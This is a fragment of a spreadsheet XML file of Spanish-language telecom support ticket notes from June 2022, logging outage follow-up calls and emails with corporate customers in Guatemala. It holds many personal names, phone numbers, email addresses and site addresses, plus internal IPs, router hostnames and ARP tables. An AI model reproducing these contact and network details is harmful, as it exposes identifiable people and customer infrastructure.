    <t>SE LLAMA A CLIENTE EVELIN GONZALEZ 58589313 MENCIONA QUE YA TODO ESTA FUNCIONANDO BIEN FUE PROBLEMA CON LA SEÑAL MOVIL DE CLARO (SERVICIO INALAMBRICO)
-ID 1001823573</t>
  </si>
  <si>
    <t>F4593075</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS VAQUERO 63147311 QUIEN SOLICITA SE LE LLAME EN 20 MINUTOS PARA VALIDAR. ID: 1001790128</t>
  </si>
  <si>
    <t>INFORMA CLIENTE CARLOS VAQUERO 63147311 QUE CONTINÚA SIN SACAR NI RECIBIR LLAMADAS, SOLICITA VISITA TÉCNICA.
ID DE LLAMADA: 1001802884</t>
  </si>
  <si>
    <t>F4593088</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ISRAEL GONZALEZ 52988845  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001825241</t>
  </si>
  <si>
    <t>F4593103</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JEFRY GARCIA-55733416  ##NO CONTESTA
1001786372
COLA:
NOMBRE: A: 55733416
NÚMERO: 55733416
DURACIÓN: 0:00:03
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55733416
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 7/06/2022 12:55:39</t>
  </si>
  <si>
    <t>F4593105</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AGUILERA MILTON 25224444  AL  CONTESTA EL SEÑOR  RAUL RAMIREZ INDICA QUE AUN SE ENCUENTRA CAIDO || SE NOTIFICA A GESTOR **
ID 1001800306
**</t>
  </si>
  <si>
    <t>F4593115</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARNOLDO SANCHEZ AL 61017966  CONFIRMA SERVICIO ESTABLE, INDICA QUE EL PROBLEMA ES INTERNO Y YA LO ESTAN REVISANDO **
ID 1001847539
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARNOLDO SANCHEZ AL 61017966 NO RESPONDE ENVIA A BUZON**
ID 1001803735
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARNOLDO SANCHEZ 61017966 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001825929</t>
  </si>
  <si>
    <t>F4593128</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  GLORIA TUCHAN AL 23370208 CONTESTA EL SEÑOR SAUL INDICA QUE ESTAN EN ALMUERZO SOLICITA QUE SE LLAME DESPUES DE LAS 14 HRS**
ID 1001793109
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GLORIA TUCHAN 23370208 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001826828</t>
  </si>
  <si>
    <t>F4593142</t>
  </si>
  <si>
    <t>SE DOCUMENTA SOLO TSHOT SE PROCEDE A DEJAR EN ETAP PENDIENTE CLIENTE PARA VALIDAR EN HORAIO HABIL 8:00 AM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JESSICA LOPEZ AL 56350730 INDICA QUE EL PROBLEMA ES CON EL ROUTER Y SOLICITA QUE SE LE PROGRAME UNA VISITA Y BRINDA LOS SIGUIENTES DATOS **
HORARIO DE ATENCION: 8:30 A 16:00 PM
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: 1 CALLE 3 AVE. ZONA 2 FRENTE A ESCUELA DE PARVULOS SOY LA FUGA SANTA ELENA PETEN.
ATENDERA EN SITIO: JESSICA LOPEZ - 56350730 ID 1001804693
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JESSICA LOPEZ 56350730 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001905078</t>
  </si>
  <si>
    <t>F4593159</t>
  </si>
  <si>
    <t>SE HABLÓ CON RAÚL HERNÁNDEZ/CLIENTE 00 525551745299 ME COMUNICA CON JULIO GONZÁLEZ/CLIENTE INDICA QUE NO HA TENIDO RESPUESTA DE SU CLIENTE FINAL, SI NO HAN ENVIADO CORREO A LAS 22:00 HORAS DE HOY, AUTORIZA EL CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 13:16
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; FRANCISCO JAVIER ALVARADO TREJO &lt;FRANCISCO.ALVARADO@CLARO.COM.GT&gt;; GARCIA GARCIA ROBERTO_26925739 &lt;GGARCIAR@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :::DHL LATO I EXPRESS - LATO-CR-EXP-HRD-MAL-02 - ICXN-00060OC - LINK || IMDHE020668
BUEN DÍA ESTIMADO CLIENTE.
COMO PARTE DEL SEGUIMIENTO AL CASO, SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO, LLEGANDO SIN PÉRDIDA DE PAQUETES A LA IP WAN 10.201.1.94 DE PUNTO REMOTO.
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS,</t>
  </si>
  <si>
    <t>F4593162</t>
  </si>
  <si>
    <t xml:space="preserve">
DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 18:41
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;
ASUNTO: RE: FALLA ENLACE DISTRIBUIDORA ESCLAVOS SECUNDARIO_672400003T
BUENAS TARDE ESTIMADOS (A):
SE OBSERVA PARA EL ID 672400003T, ALCANZABLE A NIVEL DE PING CON REINICIO HACE POCO MÁS DE 4 HORAS. POR FAVOR INDICARNOS SI CONTINÚAN CON EL INCONVENIENTE Y DE SER ASÍ, ENVIARNOS UNA IP O TRAZA DEL SERVICIO AL CUAL NO SE LOGRA LLEGAR. GRACIAS DE ANTEMANO.</t>
  </si>
  <si>
    <t>F4593175</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON EDEL MARTÍNEZ 54878452  MENCIONA QUE AUN PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001257673</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BYRON EDEL MARTÍNE 79685021 MENCIONA QUE YA ESTA SU IT EN PR, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001188677</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL 2378 3900 JOSUE DAVID PARA CONSULTAR SOBRE QUÉ AGENCIA QUISO REPORTAR PERO NO CONTESTA, TAMBIÉN SE LLAMA AL DE PUNTO REMOTO BYRON EDEL MARTÍNEZ
3001668655
COLA:
NOMBRE: A: 23783900
NÚMERO: 23783900
DURACIÓN: 0:03:00
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 16/06/2022 18:13:22
3001669031
COLA:
NOMBRE: A: 54878452
NÚMERO: 54878452
DURACIÓN: 0:00:43
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 16/06/2022 18:13:58
3001669121
COLA:
NOMBRE: A: 54878452
NÚMERO: 54878452
DURACIÓN: 0:00:39
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 16/06/2022 18:14:41
3001669232
COLA:
NOMBRE: A: 79685021
NÚMERO: 79685021
DURACIÓN: 0:00:41
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 16/06/2022 18:15:38</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON EDEL MARTÍNE 79685021 MENCIONA QUE SU IT AUN NO HA LLEGADO POR LO QUE SOLICITA LLAMADA PARA LAS 16:00 HRS
-ID 3001155947</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON EDEL MARTÍNEZ RODRÍGUEZ AL  54878452 INDICA QUE YA REINICIO EL EQUIPO PERO AUN NO SE PUEDE CONECTAR QUE  MENSAJE DE SERVIDOR NO ENCONTRADO || SE NOTIFICA A GESTOR **
ID 2001035631
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON EDEL MARTÍNEZ 54878452 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001905992</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BYRON EDEL MARTÍNEZ  54878452  MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001046166</t>
  </si>
  <si>
    <t>F4593186</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONATAN AL 50185138 INDICA QUE ESTA TODO OK QUE NO SABIA QUE HABIAN REPORTADO EL SERIVIO **
ID 1001810692 - 1001811000
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL ANTONIO MORAN AL 42111939 CONTESTA EL SEÑOR DIEGO CABRERA INDICA QUE AUN VE PERDIDAS CADA 3 SEGUNDOS || SE NOTIFICA A GESTOR**
ID 1001811969
**</t>
  </si>
  <si>
    <t>F4593198</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 504 94560221 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001043732</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 8 DE JUNIO DE 2022 14:43
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;
CC: MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; HELPDESK. &lt;HELPDESK@CAMPERO.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE GRANJERO 307
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4593201</t>
  </si>
  <si>
    <t>JUAN PABLO MORALES BARRONDO
MAR 07/06/2022 2:00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3201¿¿
ID: 8900765T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0703
UBICADO EN:
COLONIA EL BOSQUE ZONA 5 FRENTE IGLESIA TESTIGOS DE JEHOVA HUEHUETENANGO¿
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS. ¿
¿</t>
  </si>
  <si>
    <t>F4593205</t>
  </si>
  <si>
    <t>SE HABLÓ CON LIGIA FERNÁNDEZ/CLIENTE 58266814 INDICA QUE EL SERVICIO HA ESTADO IRREGULAR, PIDE SE LE LLAME MAÑANA A LAS 12:00PM (MEDIODÍA) PARA SEGUIMIENTO Y/O VALIDAR SERVICIO.</t>
  </si>
  <si>
    <t xml:space="preserve"> SE CORTO LA LLAMADA CON CLIENTE SRTA. LIGIA FERNANDEZ ...
DISPOSITION: ANSWERED
NAME: BRYAN ALEJANDRO POITEVIN ALDANA
NUMBER: 4548
START: TODAY, 3:31 PM
END: TODAY, 3:33 PM
DURATION: 1:41
CALL ID: 1001833760</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. LIGIA FERNANDEZ 58266814 NO CONTESTA IVR ENVIA A BUZON, ID: 1001837207.
PE: 10.179.28.44
ENLACE OPERATIVO:
&lt;GAMAGTAMN1D1C04B03EIM1&gt;PING -VPN INTERNET_GT_METRO 10.174.77.112
  PING 10.174.77.112: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.174.77.112: BYTES=56 SEQUENCE=1 TTL=255 TIME=4 MS
    REPLY FROM 10.174.77.112: BYTES=56 SEQUENCE=2 TTL=255 TIME=2 MS
    REPLY FROM 10.174.77.112: BYTES=56 SEQUENCE=3 TTL=255 TIME=2 MS
    REPLY FROM 10.174.77.112: BYTES=56 SEQUENCE=4 TTL=255 TIME=2 MS
    REPLY FROM 10.174.77.112: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.174.77.112 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/4 MS
EQUIPOS ASOCIADOS CON SALIDA HACIA INTERNET.
CC_PLASTIMAS_GT_INTERNET_AMATITLAN#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/914900001T/_/
GI0/0/1                        ADMIN DOWN     DOWN
GI0/1/0                        UP             UP
GI0/1/1                        UP             UP
GI0/1/2                        DOWN           DOWN
GI0/1/3                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_PLASTIMAS_GT_INTERNET_AMATITLAN#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.77.97            0   CCBB.FE24.4BD4  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.174.77.112           -   2416.9D57.EC00  ARPA   GIGABITETHERNET0/0/0
INTERNET  190.148.193.37          -   2416.9D57.EC74  ARPA   VLAN1
INTERNET  190.148.193.38          0   INCOMPLETE      ARPA
INTERNET  192.168.1.1             -   2416.9D57.EC74  ARPA   VLAN1
INTERNET  192.168.1.5             0   AC84.C6A3.F92C  ARPA   VLAN1
INTERNET  192.168.1.6             0   AC84.C6A3.F972  ARPA   VLAN1
INTERNET  192.168.1.7             1   14B3.1F20.9839  ARPA   VLAN1
INTERNET  192.168.1.8             0   FC01.7C20.A6E9  ARPA   VLAN1
INTERNET  192.168.1.9            79   00E0.4C68.04BC  ARPA   VLAN1
INTERNET  192.168.1.10            0   0017.C8C0.F4E7  ARPA   VLAN1
INTERNET  192.168.1.11            5   F8B4.6AD2.22EA  ARPA   VLAN1
INTERNET  192.168.1.114           0   0017.C8BC.8FA6  ARPA   VLAN1
INTERNET  192.168.1.126           0   FC01.7C20.9C6D  ARPA   VLAN1
INTERNET  192.168.1.137          11   F051.36EE.8A5D  ARPA   VLAN1
INTERNET  192.168.1.138           8   F651.F9EA.1374  ARPA   VLAN1
INTERNET  192.168.1.140          24   A285.DEEB.71E1  ARPA   VLAN1
INTERNET  192.168.1.141          56   02E3.A287.D8D7  ARPA   VLAN1
INTERNET  192.168.1.142          34   1EEB.E60A.FEBD  ARPA   VLAN1
INTERNET  192.168.1.143          26   1A9B.654D.0962  ARPA   VLAN1
INTERNET  192.168.1.144           0   D4BE.D9C4.36DC  ARPA   VLAN1
INTERNET  192.168.1.145          11   3E54.4CC6.119B  ARPA   VLAN1
INTERNET  192.168.1.147          15   6EAA.020F.DA0E  ARPA   VLAN1
INTERNET  192.168.1.149          22   D251.C61C.7399  ARPA   VLAN1
INTERNET  192.168.1.150           2   9654.4956.9649  ARPA   VLAN1
INTERNET  192.168.1.154         112   F25E.1C19.F7B0  ARPA   VLAN1
INTERNET  192.168.1.157          79   EC2E.9875.9F81  ARPA   VLAN1
INTERNET  192.168.1.232           0   3CEF.8C35.F0A4  ARPA   VLAN1
CC_PLASTIMAS_GT_INTERNET_AMATITLAN#PING 8.8.8.8 SO
CC_PLASTIMAS_GT_INTERNET_AMATITLAN#PING 8.8.8.8 SOURCE VCL
CC_PLASTIMAS_GT_INTERNET_AMATITLAN#PING 8.8.8.8 SOURCE VL
CC_PLASTIMAS_GT_INTERNET_AMATITLAN#PING 8.8.8.8 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.148.193.37
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 28/28/28 MS
CC_PLASTIMAS_GT_INTERNET_AMATITLAN#PING 1.1.1.1 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.148.193.37
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 28/30/32 MS
CC_PLASTIMAS_GT_INTERNET_AMATITLAN#</t>
  </si>
  <si>
    <t>F4593212</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORDI GONZALEZ 57108948 MENCIONA QUE EL SERVIVIO SIGUE DANDO PROBLEMA
INDICA QUE YA APERTURO VARIOS TICKETS SOLICITANDO VISITA TECNICA, CLIENTE SOLICITA UNA CERTIFICACION DEL SERVICIO
-ID 1001872938
NOMBRE DEL CLIENTE: CONSOLIDADOS INCORPORADOS DE SERVICIOS, S.A.
UBICACIÓN:22 C. 9-33 Z.16 PASEO CAYALA HOTEL MARRIOT
CONTACTO EN SITIO: JORDI GONZALEZ
HORARIO DE ATENCION: 8:00 - 16:00
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO -- JGONZALEZ@CAYALA.COM</t>
  </si>
  <si>
    <t>-* SE HABLA CON JORDI GONZALEZ (CLIENTE) INFORMA QUE CONTINUA CON FALLAS, NO ALCANZA EL ANCHO DE BANDA, SE LE COMENTA QUE NO FUE POSIBLE COMPLETAR LA CERITIFICACION, INFORMA QUE ESTARÁN PROGRAMANDO UNA VM PARA PODER RELIZAR LA DESCONEXION DE LA LAN TENTATIVAMENTE MAÑANA POR LA MADRUGADA, NOS COMPARTIRÁ EL DATO A LA BREVEDAD POSIBLE -*
-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORDI GONZALEZ 57108948 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001804629</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE A LA ESPERA QUE NOS CONFIRME EL CIERRE DEL CASO
DE: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 10:16
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JORDY ESTUARDO GONZALEZ MENDEZ &lt;JGONZALEZ@CAYALA.COM&gt;; ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; BAUTISTA CASTILLO GABRIEL ALFONSO &lt;GABRIEL.BAUTISTA@CLARO.COM.GT&gt;; CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;; LUNA AGUILERA, JOSE &lt;JOSE.LUNAAGUILERA@MARRIOTT.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; IVAN EDUARDO AYALA MORALES &lt;IVAN.AYALA@CLARO.COM.GT&gt;; MARIA FERNANDA LOPEZ ROSAS &lt;MARIAF.LOPEZ@CLARO.COM.GT&gt;; REYES, LUIS &lt;LUIS.REYES@MARRIOTT.COM&gt;; GUILLERMO ESTUARDO AVILA AJIATAS &lt;GUILLERMO.AVILA@CLARO.COM.GT&gt;; MARIO ALBERTO TRABANINO IXCOT &lt;MARIO.TRABANINO@CLARO.COM.GT&gt;; JOSE FERNANDO ROMERO LOPEZ &lt;JOSE.ROMERO@CLARO.COM.GT&gt;
CC: MONROY, DANIEL &lt;DANIEL.MONROY@MARRIOTT.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: 886800019T || CONSOLIDADOS INCORPORADOS DE SERVICIOS, S.A.
BUEN DÍA ESTIMADO CLIENTE
DANDO SEGUIMIENTO A SU CASO, NOS PUDIERA INDICAR SI CUENTAN CON ALGÚN INCONVENIENTE CON EL SERVICIO, ESTAREMOS A LA ESPERA DE SU CONFIRMACIÓN PARA PROCEDER CON EL CIERRE DEL TICKET.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>SE HABLÓ CON JORDI GONZÁLEZ/CLIENTE 57108948 INDICA QUE YA CONTESTÓ JOSÉ LUNA CLIENTE FINAL, SÓLO PIDE SE LE CONFIRMA LA FECHA SIGUIENDO LA SECUENCIA DEL CORREO, SE INFORMA A GESTIÓN N1 VÍA SKYPE DE LO ANTERIOR.</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 57108948 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, CORTA LA LLAMADA; SE DEBE LLAMAR MAÑANA A LAS 08:00AM; ADICIONAL SE LE PIDE APOYO VÍA CORREO.
ASUNTO: RE: 886800019T || CONSOLIDADOS INCORPORADOS DE SERVICIOS, S.A.</t>
  </si>
  <si>
    <t>**SE LLAMA A ACLIENTE JORDI GONZALEZ 57108948 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001279874
**</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE JORDI GONZALEZ 57108948 MENCIONA QUE SE COORDINE VISITA PARA MAÑANA A LAS 9:00 HRS EN CONJUNTO
-ID 1001978560</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORDI GONZALEZ 57108948 MENCIONA QUE NO TIENE INFORMACION CUALES SON LOS EQUIPOS DEL REDUNDANTE Y LOS DEL PRINCIPAL UNICAMENTE TIENE INFORMACION QUE ESTAN EN EL MISMO RACK
-ID 1001969394</t>
  </si>
  <si>
    <t>SE LLAMA A CIENTE JORDI GONZALEZ 57108948 MENCIONA QUE LOS PERMISOS YA ESTAN GESTIONADOS, NO HAY PROBLEMA CON LA VISITA PORQUE ACTUALMENTE ESTAN TRABAJANDO CON EL REDUNDANTE
-ID 1001911096</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JORDI GONZALEZ NÚMERO: 57108948 , QUIEN INDICA QUE COMUNICARA CON EL ESTIMADO RODRIGO LUNA PARA QUE SE PUEDA AGILIZAR Y MOSTRARLE EL SITIO EN DOND SE ENCUENTRA LOS EQUIPOS,  // A LA ESPERA DE QUE TÉCNICO CONFIRME QUE YA LE BRINDARON EL ACCESO A LOS EQUIPOS
2001178365
COLA:
NOMBRE: A: 57108948
NÚMERO: 57108948
DURACIÓN: 0:02:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 57108948
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 9/06/2022 10:30:43</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORDI GONZALEZ 57108948   NO RESPONDE, SE INTENTARA LUEGO
-ID 1001865329</t>
  </si>
  <si>
    <t>F4593214</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON EVIDENCIAS Y EN ESPERA DE RESPUESTA-
RE: ENLACE INESTABLE DE PALI COYOL ID: CONTR0001398216OC</t>
  </si>
  <si>
    <t>F4593231</t>
  </si>
  <si>
    <t>SE LE NOTIFICA AL CLIENTE JUAN CARLOS LIANZ QUE SE ESTA TRABAJANDO EN EL CASO, SE DA POR ENTERADO.
2001084765
COLA:
NOMBRE: A: 42179386
NÚMERO: 42179386
DURACIÓN: 0:01:57
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42179386
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 8/06/2022 16:56:21</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE HABLO CON EL CLIENTE LUIS DAVILA QUIEN INDICA QUE POR MOMENTOS NO INGRESAN LAS LLAMADAS A LOS DIDS Y POR MOMENTOS SI.
1001809823
COLA:
NOMBRE: A: 78201700
NÚMERO: 78201700
DURACIÓN: 0:00:11
ESTADO: MARCANDO
DETALLES: 78201700
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 7/06/2022 14:14:02</t>
  </si>
  <si>
    <t>PROBLEMA EN LA PBX. LLAMADAS HACIA EL NUMERO PRINCIPAL COMPLETAN SIN PROBLEMA. CLIENTE DANIEL QUIÑONEZ REALIZA PRUEBAS  Y SOLICITA SE LE CONTACTE EN HORARIO DE LA TARDE. SE REINICIO AETHRA A SOLICITUD DEL CLIENTE.
1001957859
COLA:
NOMBRE: DE: 47683133
NÚMERO: 47683133
DURACIÓN: 0:24:15
ESTADO: CONECTADA
DETALLES: 47683133
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 8/06/2022 10:56:52</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL DID DE SISTEMAS Y CONTESTA DANIEL, QUIEN INDICA QUE YA ESTAN INGRESANDO LAS LLAMADAS A LOS DIDS PERO SOLICITA QUE SE REALICEN MAS PRUEBAS. INDICA QUE SU PBX ES UNA ASTERISK.
1001829734
COLA:
NOMBRE: A: 78201798
NÚMERO: 78201798
DURACIÓN: 0:03:00
ESTADO: CONECTADA
DETALLES: 78201798
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 7/06/2022 15:21:20</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS 42179386 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001288915</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE   JUAN CARLOS LIANZ QUIEN SOLICITA SE LE MARQUE MAÑANA 09/06 A LAS 10 HORAS PARA VALIDAR
2001090835
COLA:
NOMBRE: A: 42179386
NÚMERO: 42179386
DURACIÓN: 0:00:00
ESTADO: MARCANDO
DETALLES: 42179386
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 8/06/2022 17:18:55</t>
  </si>
  <si>
    <t>F4593260</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAUL CABRERA/77660726 SOLICITA LLAMADA EN 10 MINUTOS
1001890987
COLA:
NOMBRE: A: 50577660726
NÚMERO: 50577660726
DURACIÓN: 0:01:13
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50577660726
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 7/06/2022 20:37:24</t>
  </si>
  <si>
    <t>F4593262</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EUDES RAYMUNDO BATZ 31032448 INFORMA QUE SOLO ATIENDEN A LAS 17 HRS QUE SE PROGRAME VISITA PARA MAÑANA A LAS 8:00 AM **
ID 1001851196
**</t>
  </si>
  <si>
    <t>SE RECUPERA PNG A WAN Y RED PUBLICA ENLACE ACTIVO SE APLICA RESET FISICO A CISCO ENLACE RESTABLECE
&lt;SLLAGTSLN1T2C01B02EIM2&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE INTERNET_GT_DEPTAL 190.56.194.170
  PING 190.56.194.170: 56  DATA BYTES, PRESS CTRL_C TO BREAK
